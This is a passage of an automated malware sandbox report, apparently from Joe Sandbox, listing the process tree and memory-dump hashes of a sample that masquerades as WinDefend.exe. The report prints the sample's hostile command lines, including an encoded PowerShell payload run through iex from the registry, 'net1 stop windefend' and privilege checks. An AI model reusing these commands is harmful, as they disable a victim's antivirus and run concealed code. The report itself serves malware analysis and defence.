JwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8088, Parent PID: 8072

General

Target ID:	27
Start time:	09:34:11
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	09:34:11
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	09:34:12
Start date:	23/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720
Imagebase:	0x7ff72fc90000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	09:34:12
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\Temp\WinDefend.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Imagebase:	0x8d0000
File size:	89'088 bytes
MD5 hash:	5FC6A541845FDAFB597DDFB98FA28B54
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	09:34:15
Start date:	23/05/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\sc.exe" qc windefend
Imagebase:	0x7ff7a8440000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	09:34:15
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Imagebase:	0x7ff77add0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	09:34:15
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Imagebase:	0x7ff77add0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5476, Parent PID: 5800

General

Target ID:	37
Start time:	09:34:15
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	09:34:15
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	09:34:15
Start date:	23/05/2024
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\whoami.exe" /groups
Imagebase:	0x7ff7fb090000
File size:	73'728 bytes
MD5 hash:	A4A6924F3EAF97981323703D38FD99C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	09:34:16
Start date:	23/05/2024
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\whoami.exe" /groups
Imagebase:	0x7ff7fb090000
File size:	73'728 bytes
MD5 hash:	A4A6924F3EAF97981323703D38FD99C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	09:34:16
Start date:	23/05/2024
Path:	C:\Windows\System32\SecurityHealthSystray.exe
Wow64 process (32bit):	false
Commandline:	SecurityHealthSystray
Imagebase:	0x7ff60d210000
File size:	86'016 bytes
MD5 hash:	783C99AFD4C2AE6950FA5694389D2CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	09:34:16
Start date:	23/05/2024
Path:	C:\Windows\System32\SecurityHealthSystray.exe
Wow64 process (32bit):	false
Commandline:	SecurityHealthSystray
Imagebase:	0x7ff60d210000
File size:	86'016 bytes
MD5 hash:	783C99AFD4C2AE6950FA5694389D2CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	09:34:16
Start date:	23/05/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\net1.exe" start TrustedInstaller
Imagebase:	0x7ff6294a0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	09:34:16
Start date:	23/05/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\net1.exe" start TrustedInstaller
Imagebase:	0x7ff6294a0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	09:34:17
Start date:	23/05/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\net1.exe" start lsass
Imagebase:	0x7ff6294a0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	09:34:17
Start date:	23/05/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\net1.exe" start lsass
Imagebase:	0x7ff6294a0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	09:34:17
Start date:	23/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	09:34:17
Start date:	23/05/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5228, Parent PID: 4476

General

Target ID:	49
Start time:	09:34:17
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	09:34:17
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\sc.exe" qc windefend
Imagebase:	0x7ff7a8440000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\sc.exe" qc windefend
Imagebase:	0x7ff7a8440000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Imagebase:	0x7ff77add0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7856, Parent PID: 4088

General

Target ID:	54
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Imagebase:	0x7ff77add0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7772, Parent PID: 7872

General

Target ID:	55
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6068e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\whoami.exe" /groups
Imagebase:	0x7ff7fb090000
File size:	73'728 bytes
MD5 hash:	A4A6924F3EAF97981323703D38FD99C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\whoami.exe" /groups
Imagebase:	0x7ff7fb090000
File size:	73'728 bytes
MD5 hash:	A4A6924F3EAF97981323703D38FD99C4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\SecurityHealthSystray.exe
Wow64 process (32bit):	false
Commandline:	SecurityHealthSystray
Imagebase:	0x7ff60d210000
File size:	86'016 bytes
MD5 hash:	783C99AFD4C2AE6950FA5694389D2CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	09:34:20
Start date:	23/05/2024
Path:	C:\Windows\System32\SecurityHealthSystray.exe
Wow64 process (32bit):	false
Commandline:	SecurityHealthSystray
Imagebase:	0x7ff60d210000
File size:	86'016 bytes
MD5 hash:	783C99AFD4C2AE6950FA5694389D2CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	09:34:21
Start date:	23/05/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\net1.exe" stop windefend
Imagebase:	0x7ff6294a0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	09:34:21
Start date:	23/05/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\net1.exe" stop windefend
Imagebase:	0x7ff6294a0000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF848F20573 Relevance: .7, Instructions: 737COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2006729818.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a13e285e2733ce5b1c46386728fae1e9758927d121a1d0417e2cfbe3188025
Instruction ID: e9f0dac3cc5302677b363254be2c93ac7ec523cc4ea0aef30e4f380155c3508f
Opcode Fuzzy Hash: e1a13e285e2733ce5b1c46386728fae1e9758927d121a1d0417e2cfbe3188025
Instruction Fuzzy Hash: A5C10322A2E9499FE384BB2C64567B5B7D2EF98790F2401BAD40CC32C7DE2DAC418755

Function 00007FF848F20C63 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2006729818.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dd4d44001228e636e817300da1defc93f4ae12a0e84f3d46b1f1d760fa6fd72
Instruction ID: a2c26f322bdc255d51210ea705fbd24f61829ed9ee665b4e20018cc3e2419982
Opcode Fuzzy Hash: 5dd4d44001228e636e817300da1defc93f4ae12a0e84f3d46b1f1d760fa6fd72
Instruction Fuzzy Hash: 15412C71B1C9498FEB88FB6CD459ABCB7E1FF99351F040179E04DC3292DE64A8428745

Function 00007FF848F20BDD Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2006729818.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a19348e17697a46cbac4b6c94717e746a0c08c8011fddc9603658bcdefe910
Instruction ID: 12490e20184f65f1fd531e5c5feb1f14cc6b4602d9ff1a95105a2d5d445f4f9b
Opcode Fuzzy Hash: 44a19348e17697a46cbac4b6c94717e746a0c08c8011fddc9603658bcdefe910
Instruction Fuzzy Hash: C4F0283280C9DC1FD765AB24881C6FA3FF1EF86340F0800ABE88DD3181DE2559048B91

Function 00007FF848F20480 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2006729818.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10e1530ed6b6beb3645e65a54f737f7c52436a94c41ead8904973c0a041f5a9
Instruction ID: 9f5eb18b00d77c5ee49226a280c5898b30fa544ec0cdb40d1b82320606ded41b
Opcode Fuzzy Hash: c10e1530ed6b6beb3645e65a54f737f7c52436a94c41ead8904973c0a041f5a9
Instruction Fuzzy Hash: 96F0E5B2C1895C5FD7B4AA24880D7BA7AF5EB85750F10003EE84EE3280DE6068058791

Function 00007FF848F20488 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2006729818.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f20000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279a1a9285c8d6a5d672ef2e6a3e2538433f224aae255b1db851d4e4593c6594
Instruction ID: 1deb2484f4bc0b6254bc299dae8014dffef9e7210ae808bc4beff92d72a78736
Opcode Fuzzy Hash: 279a1a9285c8d6a5d672ef2e6a3e2538433f224aae255b1db851d4e4593c6594
Instruction Fuzzy Hash: B1E0D831B2DC0D1FD994F32C5425E6862C1EBCC350F5006B2E40CC3296DD18EC404380

Analysis Process: Client.exePID: 6152, Parent PID: 6176COMMON

Execution Graph

Execution Coverage:	25.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF848F03D5E Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

cV_H, xrefs: 00007FF848F03F93

Memory Dump Source

Source File: 00000002.00000002.2058469243.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f00000_Client.jbxd

Similarity

API ID:
String ID: cV_H
API String ID: 0-633494986
Opcode ID: 4bdb644b28278a7a62c28d7717c483f8438dc82439af4026c5a728776ca27cda
Instruction ID: 74d584aa804158e228d296b327517b1c79172c4e0556c66893e307175841703c
Opcode Fuzzy Hash: 4bdb644b28278a7a62c28d7717c483f8438dc82439af4026c5a728776ca27cda
Instruction Fuzzy Hash: 80C14831A1DB495FE71DEB3898562FA77E1EF96350F0442BED08AC31D7DE2868068781

Function 00007FF848F00E5D Relevance: 1.7, Strings: 1, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#CP_^, xrefs: 00007FF848F01044

Memory Dump Source

Source File: 00000002.00000002.2058469243.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f00000_Client.jbxd

Similarity

API ID:
String ID: #CP_^
API String ID: 0-2637653657
Opcode ID: dd245671bb00d08ca4a1c13ccf169f6189536c889d5820cf1ef1bee68a307d11
Instruction ID: d034b8b1e0d252b0da89d67966861af3a7731fd2797633b8f54c9949dfb6808f
Opcode Fuzzy Hash: dd245671bb00d08ca4a1c13ccf169f6189536c889d5820cf1ef1bee68a307d11
Instruction Fuzzy Hash: 83D17831D0E9864FF795BB7818612BA7A91EF92788F1401BAD84CC71C7EE1CAC458356

Function 00007FF848F00E70 Relevance: .3, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2058469243.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f00000_Client.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9dda83bd9bdfa318af43dd3444084c00bde040e4726c974dc8611cb3bd32f6
Instruction ID: fbe48ab5214cf51c8fbd4de5af05adc4524bcc7030cecb4cf37097384cc77b49
Opcode Fuzzy Hash: af9dda83bd9bdfa318af43dd3444084c00bde040e4726c974dc8611cb3bd32f6
Instruction Fuzzy Hash: F7A11831D0E9C24EF7A57B78185117A6AA1EF93789F1805BAD84C871C7FF18AC44835A

Analysis Process: Infected.exePID: 3144, Parent PID: 6176COMMON

Execution Graph

Execution Coverage:	30%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 00007FF848F131DE Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 448
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00007FF848F13534

Strings

HAH, xrefs: 00007FF848F133A7
HAH, xrefs: 00007FF848F13409

Memory Dump Source

Source File: 00000003.00000002.2052295708.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848f10000_Infected.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: HAH$HAH
API String ID: 2706961497-524784639
Opcode ID: c78f906645e17ddd659c4bab70eed84f52f0d9d5bc5493e3d0f9bcf64872f08e
Instruction ID: 47ce885eb814a63ae48afad24fbdd064779379739f2b62613998ff7b7ab8a59d
Opcode Fuzzy Hash: c78f906645e17ddd659c4bab70eed84f52f0d9d5bc5493e3d0f9bcf64872f08e
Instruction Fuzzy Hash: 66C1493191DB495FE71DEB7898162FA77E1EF95360F0441BED08AC31D7DE2868068781

Analysis Process: WinDefend.exePID: 4768, Parent PID: 6176COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	1

Executed Functions

Function 04F50C18 Relevance: 1.8, Strings: 1, Instructions: 541
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

uI[, xrefs: 04F51442

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID: uI[
API String ID: 0-2758268925
Opcode ID: 0ce7b9102c0039b40d275d81b57a1411b4c0882d50b3c9451cf94d77b4a8be4e
Instruction ID: b83cfdcf38df75255dbe3228db0623eb3052a5c4a2feb8535adb512096afa630
Opcode Fuzzy Hash: 0ce7b9102c0039b40d275d81b57a1411b4c0882d50b3c9451cf94d77b4a8be4e
Instruction Fuzzy Hash: 87320975E15218DFDB64CF65D990B9EBBB2FB89300F1095AAD509B7264EB306E81CF00

Function 04F50C0F Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ccc5c1de93b94e25c55057453618a4cb658f54a11d19666e4fbac4be872953
Instruction ID: 2c5c65db730df43790fd27dbdbb97ae7ca182cc940a1966d550de4c1adce8397
Opcode Fuzzy Hash: 94ccc5c1de93b94e25c55057453618a4cb658f54a11d19666e4fbac4be872953
Instruction Fuzzy Hash: 92E1E875E01219DFDB64CF65D980BDEBBB2BB49300F1094AAD909B7264EB306E81CF50

Function 04F517B8 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26e64ceb345479bdbf4167d694dc7aa28ef3d8fabcf2b16607f0dc320ca03dbb
Instruction ID: c566591ade2db89563a8fd1d6c896017add5d6a2f7741190cf72c17377541b63
Opcode Fuzzy Hash: 26e64ceb345479bdbf4167d694dc7aa28ef3d8fabcf2b16607f0dc320ca03dbb
Instruction Fuzzy Hash: 1A714B74E15218CFCB04CFA9D6446DEBBF2AB89300F24952AD50AB7254EB34AD52CF14

Function 04F517A8 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bdee3f9df276f9398b967c93aa2973ae15ca42784a05d777c158e59949e5c75
Instruction ID: 5a58052dfedf4d213ac7df31bf5d851a72470325b102f63c0e001988faf31ff5
Opcode Fuzzy Hash: 0bdee3f9df276f9398b967c93aa2973ae15ca42784a05d777c158e59949e5c75
Instruction Fuzzy Hash: 4C713874E11218CFDB04CFA9D6846DEBBF2EB89301F24952AD506B7258EB34AD52CF14

Function 04F50448 Relevance: 5.2, Strings: 4, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 04F50692
xaq, xrefs: 04F5057B
xaq, xrefs: 04F505D7
(aq, xrefs: 04F506BE

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID: (aq$(aq$xaq$xaq
API String ID: 0-3564754046
Opcode ID: 7845c12475b03a857a144d34ea0fd0738903decbaa6fb5568df9d9fc52e68aab
Instruction ID: 5b9c9a3d3675cba031437b468460b95b936088e47e8b5c3177201f516a65f5d3
Opcode Fuzzy Hash: 7845c12475b03a857a144d34ea0fd0738903decbaa6fb5568df9d9fc52e68aab
Instruction Fuzzy Hash: 1F61BD357002059FDB199F69D850BAE7BA2EFC4710F14846DE90A9B3A5CF36EC02CB91

Function 04F500D5 Relevance: 1.8, Strings: 1, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xaq, xrefs: 04F5057B

Memory Dump Source

Source File: 00000004.00000002.3378313571.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4f50000_WinDefend.jbxd

Similarity

API ID:
String ID: xaq
API String ID: 0-793007810
Opcode ID: 37b7f00a03fbd4eb0aa7ef1e4cafa75fbc0ed51ad8ef0ee9d439e12e254cec3f
Instruction ID: 9ac1b403004f5a5ab5f5875138a3b55bed012b77e54b108ae6222cf87df79697
